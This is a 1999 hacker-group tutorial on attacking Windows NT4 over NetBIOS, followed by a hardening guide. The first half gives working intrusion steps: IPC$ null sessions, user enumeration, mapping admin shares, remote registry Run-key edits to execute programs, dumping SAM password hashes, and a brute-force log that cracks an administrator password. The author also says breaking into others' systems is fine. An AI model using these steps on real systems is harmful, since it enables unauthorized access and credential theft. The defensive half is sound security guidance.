---------------------------------------- % % % % % gH Presents % % NT4 Intrusion and Security % % by Mnemonic % % % % % ----------------------------------------- simply global hell owning the world one system at a time =========================== ____ ______ __ ___ _____ ____ __________ / / / ___/ \ \/ / / \ / \ ____ /___ ___/ / /__ / /__ \ / / <> / / __ \ / \ / / / ___/ / __/ / / / _/ \ / / __ \ / / / \ / /__ / / / /\ \ \____/ \ / \ \ /__/\__\ \_____/ /__/ \_/ \__\ \____/ \__\ KRS http://www.weownyourlives.forever =========================== NT4 Intrusion and Security by Mnemonic 7/30/99 xkyller@hotmail.com KeyRoot www.weownyourlives.forever =========================== Contents: 01 - Abstract 02 - Intro 03 - How You Can Use This 04 - NetBIOS Hacking 4.1 - NAT Attacks 05 - Security 5.1 - Password Policy 5.2 - Renaming the Administrator Account 5.3 - Auditing 5.4 - Disabling the Guest Account 5.5 - Share Passwords 5.6 - Restricting the Registry 5.7 - Permissions 5.8 - SMB Signatures 5.9 - Securing %systemroot%\repair\sam._ 06 - NET commands 07 - Conclusion =========================== 01 - Abstract I'm not sure what you want to get out of this but basically this paper is on breaking into Windows NT 4.0 systems via NetBIOS and securing the methods that I go over. =========================== 02 - Intro Alright so you want to know how to break into NT4? Well don't keep reading if that's your intention. This is about fixing your system so people like me don't break into it. I thought about putting the intrusion methods and the security features in the same section but I ended up separating them. I hope you like it. And yes KeyRoot really does own your life forever. So does gH. =========================== 03 - How You Can Use This As I'm writing this I'm hoping that you will be able to use this to secure your system instead of using it to break into others. If you feel like breaking into other systems that's still cool hehe. Basically I don't care what you do as long as I'm of some help. Thanks for reading and I'll release more stuff soon. =========================== 04 - NetBIOS Hacking Alright when you've got an NT machine that you want to break into, typically you want to portscan it and see if one of these ports is open: 135 137 (Name Service) 138 (Datagram Service) 139 (Session Service) These are the ports used by NetBIOS. If you want to scan a a range of ip's for shares you can use the Legion scanner. Basically what I'll be covering is the use of LMHOSTS. This filed is used by administrators to preload the names of other workstations on the network into the NetBIOS cache so that they can remotely run utilities like regedit on the systems on their network. You can only use the lmhosts in conjunction with a null connection to the target machine. So you can't do it unless you login. To open your lmhosts file just do find.. file.. lmhosts and it should pop up in your root windows directory. Lmhosts entries look like this: anynameyouwant targetip #PRE #DOM Alright right now I'm going to discuss some things you probably already know and also some things that I haven't seen really well documented. If there is no NetBIOS password required, which is the case the majority of the time, then you're set. Right now you want to open a null session with the system. You can't run any net commands until a null session is started. C:\>nbtstat -R <--- purges and reloads the cache name table C:\>net use \\targetname\ipc$ "" /user:"" The command completed successfully. This just connects to the system's ipc$ share which is a default share. If NetBIOS is passworded you want to get a list of users so you can start guessing passwords. For this you can use a command call nbtstat which is used to request information from the NetBIOS host: C:\>nbtstat -A targetname NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Mnemonic <03> UNIQUE Registered KeyRoot <03> GROUP Registered icesk <03> UNIQUE Registered Mnemonic <03> UNIQUE Registered Basically every name that is <03> is either a user or the name of a workstation. So when you connect to the machine if is passworded you can start trying to guess the password to one of these account names. If you still can't get it skip to the next section (NAT Attacks). Nbtstat has several uses. C:\>nbtstat /? Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] Switches -a Lists the remote computer's name table given its host name. -A Lists the remote computer's name table given its IP address. -c Lists the remote name cache including the IP addresses. -n Lists local NetBIOS names. -r Lists names resolved by broadcast and via WINS. -R Purges and reloads the remote cache name table. -S Lists sessions table with the destination IP addresses. -s Lists sessions table conversions. You can use these other options to learn more about the system (nbtstat does not require a null connection). The following is the same example of net view as my Windows 98 Security Issues advisory: C:\>net view \\targetname Shared resources at \\targetname Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin C$ Disk C Drive D$ Disk D Drive IPC$ IPC Remote IPC NETLOGON Disk Logon server share HPLaser4 Printer HP LaserJet 4si The command completed successfully. This just displayed the available shares on the system. You can map to any of these shares using the net use command: C:\>net use \\targetname\sharename For example, you can access the C$ share: C:\>net use \\targetname\C$ This will only allow you access to the share if a password has not been assigned to the share. If the share is read/write to everyone then you can basically do anything you like. The NT4 Resource Kit provides a series of net tools which work in cooperation with LMHOSTS and the IPC$ null session. NetWatch - lists all shares on the remote system usrstat - shows name, full name, and last logon for each user on the system C:\>ntreskit\usrstat targetname Users at \\targetname Mnemonic - Administrator - logon: Sun Jul 29 20:15:25 1999 MostHateD - Administrator - logon: Sun Jul 29 20:54:04 1999 mindphasr - Administrator - logon: Sun Jul 29 15:19:26 1999 global - shows the members of global groups on the remote system C:\>ntreskit\global "administrators" targetname Mnemonic MostHateD mindphasr local - shows the members of local groups on the remote system C:\>ntreskit\local "administrators" targetname Mnemonic NetDom - queries remote system for its occupation and PDC C:\>ntreskit\NetDom Querying domain information on computer \\targetname ... The computer \\targetname is Searching PDC for domain targetname ... Found PDC \\targetname The computer \\targetname is the PDC of . Ok now you've got a basic feel for NetBIOS and how LMHOSTS works. Since the target system's cached in lmhosts you can open regedit or regedt32 in NT and open the location anynameyougavethetarget and edit their registry. There are so many possibilities with the registry editor. To run a program on the system, for example, you can edit the registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or ...\RunOnce or ...\RunEx These registries are remotely WRITE ACCESS to everyone unless the admin has changed it. All you have to do is add a value in the Run key of the path to the file you want to run. Let's say the administrator has created an Emergency Repair Disk. A copy of a file called the SAM (Security Account Manager) file will be found here: %systemroot%\repair\sam._ This file is READ EVERYONE by default. This file keeps usernames and passwords so what you can do is File Import SAM File in the L0phtCrack )download L0phtCrack from www.l0pht.com) utility or you can use a utility called samdump. Both of these can be used to dump usernames and their passwords. If you can't access the SAM file you might still be able to get the password from the SAM key in the registry. This could allow admin access to basically own the system. Ok another thing that you can do is run: %SystemRoot%\system32\musrmgr.exe This will open up your User Manager for Domains in NT. Since your system now believes the target is a part of your network you can Select Domain and get a list of all of the user's on that box. Ok another thing you can do is do start.. find.. computer and enter the name you put in lmhosts. Click find now and the name will come up in the box. When you select the name that will allow you to see the other box's shares in your browser. So like you can access them this way. Ok that's all for the hacking section. =========================== 4.1 - NAT Attacks Ok right now is a good time to use a tool called NAT. The NetBIOS Auditing Tool, which was released by Rhino9. NAT (NetBIOS Auditing Tool) is basically the best brute force hacking tool released for NetBIOS. The way it works is it allows you to make a series of connections to a system using a bunch of username and password combinations. This method of attack is one of the most common types of attacks and is generally effective even for getting an administrator's passwords. The fact is that hardly anybody uses good policies in creating passwords. NAT can be used to attack a single system or multiple systems. As NAT's doing what it does it tells you what's going on step by step (NAT can be downloaded from www.technotronic.com/microsoft.html). I found it unecessary for me to use NAT and show you what it looks like because it's already been done in Rhino9's Wardoc: [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: 0.0.0.0 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Tue Oct 14 11:33:46 1997 [*]--- Timezone is UTC-4.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATOR' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN' [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `PASSWORD' [*]--- Obtained server information: Server=[AENEMA] User=[] Workgroup=[STATICA] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share D$ Disk: Default share E$ Disk: Default share HPLaser4 Printer: HP LaserJet 4Si IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share print$ Disk: Printer Drivers [*]--- This machine has a browse list: Server Comment --------- ------- AENEMA [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- WARNING: Able to access share: \\*SMBSERVER\D$ [*]--- Checking write access in: \\*SMBSERVER\D$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$ [*]--- Attempting to access share: \\*SMBSERVER\E$ [*]--- WARNING: Able to access share: \\*SMBSERVER\E$ [*]--- Checking write access in: \\*SMBSERVER\E$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\E$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\E$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\print$ [*]--- WARNING: Able to access share: \\*SMBSERVER\print$ [*]--- Checking write access in: \\*SMBSERVER\print$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\print$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\print$ [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access =========================== 05 - Security Ok the first thing you need to do in securing your NT4 system is update to Service Pack 5 if you haven't already done that. You can get SP5 at www.cave.net/nt351sp5.htm. The Service Pack provides a means of securing your NT system to an extent. It's best to have the latest Service Pack and hot fixes (ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40) to keep up to date. Anyway the easiest way to secure NetBIOS is not to use it at all. NetBIOS is not up and running any shared resources until you want it to. To prevent attacks on shared resources just don't enable sharing. However, if sharing is necessary there are still ways to secure it. The first thing I suggest is disabling ipc null sessions. Since securing your NT4 system is so extensive even with the little material that I'm covering here (basically how to secure the attacks that I went over) I've decided to break this section up. Ok real quick, umm.. you can restrict anonymous network access so not just anybody can look up usernames or shares. Just add this key value to the registry: HKEY_LOCAL_MACHINE\SYSTEM System\CurrentControlSet\Control\LSA RestrictAnonymous This key should be of type REG_DWORD with a value of 1. =========================== 5.1 - Password Policy The basic out of the box NT4 system doesn't have a very strong password policy. The first thing you need to do is open up User Manager.. Policies.. Account.. now with this function you have a lot of options. Basically you want to expire passwords every thirty days and have a minimum password length of eight characters. Lockout after five bad logon attempts which resets every thirty minutes (this doesn't affect administrators). Also if you keep up to date with your Service Pack you can use Passfilt.dll, a password filter, to increase the strength of your passwords. This DLL file has the following requirements: Passwords must be at least six (6) characters long. Passwords must contain characters from at least three (3) of the following four (4) classes: English upper case letters English lower case letters Westernized Arabic numerals Non-alphanumeric ("special characters") such as punctuation symbols Passwords may not contain your user name or any part of your full name. To configure Passfilt.dll add this key value to the registry: HKEY_LOCAL_MACHINE\SYSTEM System\CurrentControlSet\Control\LSA The name should be Notification Packages with type REG_MULTI_SZ and a string of PASSFILT. Passfilt.dll is included in Service Pack 2 and up. =========================== 5.2 - Renaming the Administrator Account The default admin account is Administrator. Subsequently attackers will attack this account more than any other. If you rename the account, however, the attacker is forced to guess the account name. Go into User Manager.. User.. Rename and give it a new name. =========================== 5.3 - Auditing Alright. What you want to do in User Manager is to open Policy.. Audit.. and check the following: Logon and Logoff success and failure Use of User Rights success Use of Group Management success Security Policy Changes success and failure This will enable logging of these events which me and ten billion other people believe are security risks. Of course you want to log failed logon attempts so that you know if someone is trying to break in. The reason why you want to log successful logins is because an attacker might logon at like 3 in the morning so no one will notice. It's easy to see there's an intruder when you see the Administrator logging on in the middle of the night or at an hour you're usually at work. =========================== 5.4 - Disabling the Guest Account While you're in User Manager go ahead and disable the Guest account which is a default account with no password. User.. Properties.. check account disabled. =========================== 5.5 - Share Passwords Even if an attacker gets access to an account you can still restrict his access to the system by placing passwords on all shares. Service Pack lets you do this. However, this still leaves you vulnerable to attack so it's important to secure each method of penetration. If you want to go ahead and delete the administrative share ADMIN$ altogether you can do this: C:\> net share ADMIN$ /d =========================== 5.6 - Restricting the Registry The Registry Editor is by default accesible to everyone. Although you want to remotely access the registry yourself, you don't want to allow anyone else to. So what you need to do is add the following registry key: HKEY_LOCAL_MACHINE \CurrentcontrolSet\Control\SecurePipeServers \winreg Check the security permissions on this and make sure it's Administrators full and not even read on everyone. If you have people other than the Administrator that are read access to the registry you should at least restrict anonymous access to the registry by adding this key: HKEY\LOCAL_MACHINE\SYSTEM System\CurrentControlSet\Services\LanManServer\Parameters NullSessionPipes This key should be of type REG_MULTI_SZ with the value: Add or Remove names from the list as required by the configuration. =========================== 5.7 - Permissions It's very dangerous to allow anyone other than the Administrator read or read/write access to the WinNT and WinNT\System32 directories. So use the ACL editor to set the permissions on them so only Administrators have read and read/write access. =========================== 5.8 - SMB Signatures Service Pack 3 and up provides a more secure way to authenticate NetBIOS packets. SMB Signatures provide mutual and message authentication. The signatures are added into the SMB packets which are verified both by the client and server. To enable SMB Signatures we have to add the following key value to the server's registry: HKEY_LOCAL_MACHINE\SYSTEM System\CurrentControlSet\Services\LanManServer\Parameters RequireSecuritySignature This key should be of type REG_DWORD with a value of 1. The following key value should be added to each client's registry: HKEY_LOCAL_MACHINE\SYSTEM System\CurrentControlSet\Services\Rdr\Parameters RequireSecuritySignature This key should be of type REG_DWORD with a value of 1. =========================== 5.9 - Securing %systemroot%\repair\sam._ This is obviously something you don't want to overlook. In case you forgot, the SAM file contains the network's users and their passwords. Basically just remove the read permission of the group Everyone using this command: cacls %systemroot%\repair\sam._ /D Everyone =========================== 06 - NET Commands For more information about a specific Microsoft NET command, type the command name followed by /? (for example, NET VIEW /?). NET CONFIG Displays your current workgroup settings. NET DIAG Runs the Microsoft Network Diagnostics program to display diagnostic information about your network. NET HELP Provides information about commands and error messages. NET INIT Loads protocol and network-adapter drivers without binding them to Protocol Manager. NET LOGOFF Breaks the connection between your computer and the shared resources to which it is connected. NET LOGON Identifies you as a member of a workgroup. NET PASSWORD Changes your logon password. NET PRINT Displays information about print queues and controls print jobs. NET START Starts services. NET STOP Stops services. NET TIME Displays the time on or synchronizes your computer's clock with the clock on a Microsoft Windows for Workgroups, Windows NT, Windows 95, or NetWare time server. NET USE Connects to or disconnects from a shared resource or displays information about connections. NET VER Displays the type and version number of the workgroup redirector you are using. NET VIEW Displays a list of computers that share resources or a list of shared resources on a specific computer. =========================== 07 - Conclusion There isn't a day that goes by that I don't use the information I've given you here. I hope I've given you a good idea of what you can really do with the LMHOSTS file. Also the registry editor can do a lot more than what I've said here. I hope that what I've written has helped you in some way. Thanks again for reading it, please continue to support me as I continue to release quality papers. If you want to learn more you can contact me or NtWaK0 on EFNet or you can read The Windows NT Wardoc by Rhino9. It's very informative and I think you can learn a lot from it. Peace out. ============================================= KEYROOT SYSTEMS AT WWW.WEOWNYOURLIVES.FOREVER ============================================= ____ ______ __ ___ _____ ____ __________ / / / ___/ \ \/ / / \ / \ ____ /___ ___/ / /__ / /__ \ / / <> / / __ \ / \ / / / ___/ / __/ / / / _/ \ / / __ \ / / / \ / /__ / / / /\ \ \____/ \ / \ \ /__/\__\ \_____/ /__/ \_/ \__\ \____/ \__\ KRS http://www.weownyourlives.forever